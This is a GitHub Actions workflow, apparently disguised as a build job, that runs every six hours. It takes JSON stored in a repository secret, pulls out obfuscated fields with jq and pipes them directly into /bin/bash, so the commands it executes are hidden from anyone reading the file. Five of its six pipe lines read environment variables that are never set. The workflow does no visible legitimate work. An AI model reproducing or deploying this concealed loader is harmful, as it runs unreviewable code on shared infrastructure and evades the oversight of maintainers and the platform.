name: linxuns

on:
  workflow_dispatch:
  schedule:
    - cron: '42 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: linxuns
        env:
          o9076: ${{ secrets.o9076 }}
        run: |
          echo $o9076 | jq -r .ha24 | /bin/bash
          echo $tyoy680 | jq -r .h461 | /bin/bash
          echo $su458 | jq -r .m2857 | /bin/bash
          echo $xoy75 | jq -r .su447 | /bin/bash
          echo $d96 | jq -r .js41636 | /bin/bash
          echo $bq41 | jq -r .bo579 | /bin/bash

